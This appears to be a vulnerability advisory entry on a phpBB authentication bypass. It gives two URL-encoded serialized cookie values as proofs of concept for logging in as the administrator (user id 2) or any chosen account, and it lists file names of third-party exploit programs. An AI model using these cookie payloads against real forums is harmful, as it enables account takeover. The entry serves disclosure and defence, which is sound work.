PHPBB Authentication Bypass Vulnerability

PHPBB Authentication Bypass Vulnerability

An exploit is not required.

The following proof of concept demonstrating cookie values necessary to authenticate to the numerical id '2' account, typically the administrator account, is available:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

The following proof of concept was supplied by Dim K0r0l <dim@acolytez.com>:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%22[id]%22%3B%7D

Paisterist has provided an exploit; an additional exploit is made available by phuket (phpBBphuket.pl), and overdose <slythers@gmail.com> (phpbbexp.cpp). It should be noted that the integrity of 'phpbbexp.cpp' has not been verified by Symantec:

/data/vulnerabilities/exploits/phpbbsession.c
/data/vulnerabilities/exploits/phpBBphuket.pl
/data/vulnerabilities/exploits/phpbbexp.cpp